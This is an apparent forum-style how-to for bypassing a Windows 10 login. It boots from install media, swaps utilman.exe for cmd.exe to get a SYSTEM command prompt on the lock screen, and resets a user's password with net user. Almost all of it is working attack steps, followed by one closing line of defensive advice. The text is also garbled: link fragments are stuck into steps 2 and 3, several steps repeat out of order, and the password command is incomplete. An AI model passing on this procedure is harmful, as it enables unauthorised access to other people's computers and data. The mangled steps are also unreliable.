Make sure you have Windows 10 burned to your DVD/USB or else nothing will happen
Step 1.First Boot into the USB Or DVD
Step http://2.Click"> http://2.Click Troubleshoot
Step http://3.Click"> http://3.Click Command Prompt
Step 4.Type diskpart
Step 5.Type list volume

Step 6.Determine your C Drive location (The C Drive will have a different letter in this command prompt, so find the volume that has windows installed on it)
Step 7.Type exit
Step 8.Type c-driveletter: (example: d:)
Step 9.Type cd windows\system32

Step 10.Type move utilman.exe utilman.exe.bak
Step 11.Type copy cmd.exe utilman.exe
Step 12.Reboot
Step 13.On the Lock screen click Ease of Access
CMD WITH SYSTEM RIGHTS SHOULD POP UP
Step 14. type net user
Step 15.Find Your Username, then type your Username
Step 11.Type copy cmd.exe utilman.exe
Step 12.Reboot
Step 13.On the Lock screen click Ease of Access

Step 15.Find Your Username, then type your Username
Step 16.Type a new password, or if you leave it blank, it will blank the password.
Step 17. Login with your new password.

To avoid someone using this method to access your computer, it is recommended to encrypt the hard drive, and to put a password on BIOS access. This will keep your data a little bit safe.
